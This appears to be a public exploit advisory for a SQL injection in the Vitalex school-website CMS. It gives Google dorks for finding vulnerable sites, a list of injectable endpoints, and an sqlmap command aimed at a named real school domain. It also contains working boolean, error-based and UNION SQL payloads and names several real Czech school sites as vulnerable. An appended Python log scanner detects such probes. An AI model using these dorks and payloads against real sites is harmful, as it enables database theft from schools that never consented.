Vitalex Computers SRO Tvorba Skolnich Webu version 1.0 suffers from a remote SQL injection vulnerability.
############################################################
# Exploit Title : Vitalex Computers SRO Tvorba školních webu 1.0 SQL Injection
# Exploit Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages : vitalex.cz
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba školních webu'' site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
+ TinyMCE 4.0 - FancyBox2.1.5 - jQuery1.12.2 - jQuery UI1.11.4 -
+ CodeMirror 5.20.2
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236
############################################################
Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webu SQL Injection Vulnerability
############################################################
# Admin Panel Login Path : /administrator/
Other Possible Dorks =>
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
############################################################
# SQL Injection Exploit =>
/public/printCalendar.php?id=[SQL Injection]
/public/printFood.php?id=[SQL Injection]
/public/script.php?id=[SQL Injection]
/public/setTemplate.php?id=[SQL Injection]
/public/statniSvatky.php?id=[SQL Injection]
/index.php?type=Blog&id=[SQL Injection]
/index.php?type=Contact&id=[SQL Injection]
/index.php?type=Post&id=[SQL Injection]
############################################################
[+] SQLMAP Poc :
$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=164 AND 1041=1041

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=164 AND (SELECT 5925 FROM(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=164 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a46637249687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zEWq
########################################################################################
# Example Vulnerable Sites =>
# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#######################################################################################
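
A defender-side check for the requests described in this advisory, added here as an example and not part of the original advisory or the vendor's code: it scans web-server access logs for the listed endpoints receiving an `id` value that is not a plain integer. The Combined Log Format, the function names, the digits-only rule and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory above.
ENDPOINTS = {
    "/public/printAction.php", "/public/printCalendar.php",
    "/public/printFood.php", "/public/script.php",
    "/public/setTemplate.php", "/public/statniSvatky.php", "/index.php",
}
# Client, request target and status of a Combined Log Format entry (assumed format).
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def suspicious_id(value):
    """True when a decoded id value is anything other than 1-10 ASCII digits."""
    return re.fullmatch(r"[0-9]{1,10}", value) is None

def scan(lines):
    """Return (client, path, id_value, status) for non-numeric id values sent to a listed endpoint."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if url.path not in ENDPOINTS:
            continue
        # parse_qs percent-decodes, so %27 becomes ' and + becomes a space before the check.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if suspicious_id(value):
                hits.append((client, url.path, value, int(status)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [30/Dec/2018:10:00:01 +0100] "GET /public/printAction.php?id=164 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Dec/2018:10:00:05 +0100] "GET /public/printAction.php?id=235%27 HTTP/1.1" 200 312',
    '192.0.2.44 - - [30/Dec/2018:10:00:09 +0100] "GET /public/printAction.php?id=164%20AND%201041=1041 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/Dec/2018:10:00:12 +0100] "GET /index.php?type=Blog&id=12 HTTP/1.1" 200 8841',
    '192.0.2.44 - - [30/Dec/2018:10:00:15 +0100] "GET /index.php?type=Post&id=7+UNION+ALL+SELECT+NULL HTTP/1.1" 500 120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same digits-only rule belongs in the application itself (cast `id` to an integer and bind it in a prepared statement); the log scan only shows who has already been probing.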